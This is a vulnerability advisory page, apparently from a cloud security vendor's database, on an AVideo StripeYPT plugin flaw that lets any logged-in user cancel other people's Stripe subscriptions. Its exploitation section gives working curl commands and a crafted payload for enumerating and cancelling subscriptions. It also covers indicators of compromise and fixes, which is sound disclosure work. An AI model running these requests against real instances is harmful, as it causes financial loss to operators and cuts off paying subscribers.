CVE-2026-34737: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34737 is a missing authorization vulnerability in the StripeYPT plugin of WWBN AVideo, an open source video platform. It affects AVideo versions 26.0 and prior, allowing any authenticated (non-admin) user to cancel arbitrary Stripe subscriptions by submitting a crafted payload to an exposed debug endpoint. The vulnerability was published on March 30–31, 2026, and discovered by aisafe.io. It carries a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, Github Advisory).

Technical details

The root cause is a missing authorization check (CWE-862) in the StripeYPT plugin's test.php debug endpoint, which verifies only that a user is logged in (User::isLogged()) rather than requiring admin privileges (User::isAdmin()). The endpoint accepts Stripe webhook-style JSON payloads via $_REQUEST['payload'] and passes them through StripeYPT::getMetadataOrFromSubscription(), which ultimately calls retrieveSubscriptions(). A logic bug at StripeYPT.php:933 causes retrieveSubscriptions() to invoke $sub->cancel() on the Stripe API instead of merely fetching subscription data, resulting in actual subscription cancellation. This same bug also affects the production webhook handler processSubscriptionIPN(), broadening the attack surface beyond the debug endpoint (GitHub Advisory).

Impact

Any authenticated user on an affected AVideo instance can cancel arbitrary Stripe subscriptions belonging to other users or the platform operator by supplying a known or enumerated subscription ID. This results in direct financial harm to the platform (lost subscription revenue) and service disruption for paying subscribers who lose access to premium features. There is no confidentiality or availability impact at the system level, but the integrity of subscription state is fully compromised for any targeted subscription (GitHub Advisory, Github Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub security advisory, consisting of concrete curl commands that any authenticated user can execute against a vulnerable instance. The EPSS score is approximately 0.014% (3rd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability has not been added to the CISA KEV catalog. No threat actor attribution has been reported (Github Advisory, GitHub Advisory).

Exploitation steps

  1. Obtain authenticated session: Log in to the target AVideo instance as any regular (non-admin) user and capture the session cookie (PHPSESSID).
  2. Enumerate subscription IDs (optional): Query accessible endpoints to discover Stripe subscription IDs belonging to other users:
    curl -b "PHPSESSID=USER_SESSION" \
      "https://your-avideo-instance.com/plugin/StripeYPT/listSubscriptions.php"
  3. Craft the cancellation payload: Construct a Stripe webhook-style JSON payload containing the target subscription ID and customer ID:
    {"data":{"object":{"id":"sub_TARGET_SUBSCRIPTION_ID","customer":"cus_CUSTOMER_ID"}}}
  4. Send the request to the debug endpoint: POST the payload to test.php:
    curl -b "PHPSESSID=USER_SESSION" \
      "https://your-avideo-instance.com/plugin/StripeYPT/test.php" \
      -d 'payload={"data":{"object":{"id":"sub_TARGET_SUBSCRIPTION_ID","customer":"cus_CUSTOMER_ID"}}}'
  5. Subscription cancelled: The endpoint processes the payload, retrieveSubscriptions() calls $sub->cancel() against the Stripe API, and the target subscription is cancelled. The affected subscriber loses access to paid features (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to /plugin/StripeYPT/test.php from non-administrative user sessions; unusual access to /plugin/StripeYPT/listSubscriptions.php by regular users.
  • Logs: Web server access logs showing POST requests to test.php with payload parameters containing Stripe subscription IDs (sub_*) from non-admin accounts; repeated requests with varying subscription IDs suggesting enumeration.
  • Stripe Dashboard: Unexpected or bulk subscription cancellations in the Stripe dashboard not initiated by administrators or the affected subscribers; cancellation events correlated with AVideo server activity timestamps.
  • Application Logs: AVideo application logs showing getMetadataOrFromSubscription() or retrieveSubscriptions() calls triggered outside of normal webhook processing flows (GitHub Advisory).

Mitigation and workarounds

No official patched version was available at the time of initial publication (all versions ≤ 26.0 are affected); however, the GitHub advisory references a commit (WWBN/AVideo@8ac79b9) indicating a fix has since been applied — upgrade to a version newer than 26.0 as soon as available. Two code-level fixes are recommended: (1) change User::isLogged() to User::isAdmin() in plugin/StripeYPT/test.php:4 to restrict the debug endpoint to administrators only, and (2) remove the $sub->cancel() call from retrieveSubscriptions() at StripeYPT.php:933 so the method only retrieves subscription data. As an immediate workaround, disable the StripeYPT plugin if not actively needed, restrict access to test.php via web server configuration (e.g., deny all access), and review Stripe subscription logs for unauthorized cancellations to restore affected subscriptions (GitHub Advisory, Github Advisory).

Community reactions

The vulnerability was discovered and reported by aisafe.io and credited to researcher adrgs. It was published to the GitHub Advisory Database on April 1, 2026, and received standard automated tracking across CVE aggregators. No notable vendor statements beyond the advisory itself, significant researcher commentary, or major media coverage have been identified for this vulnerability.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management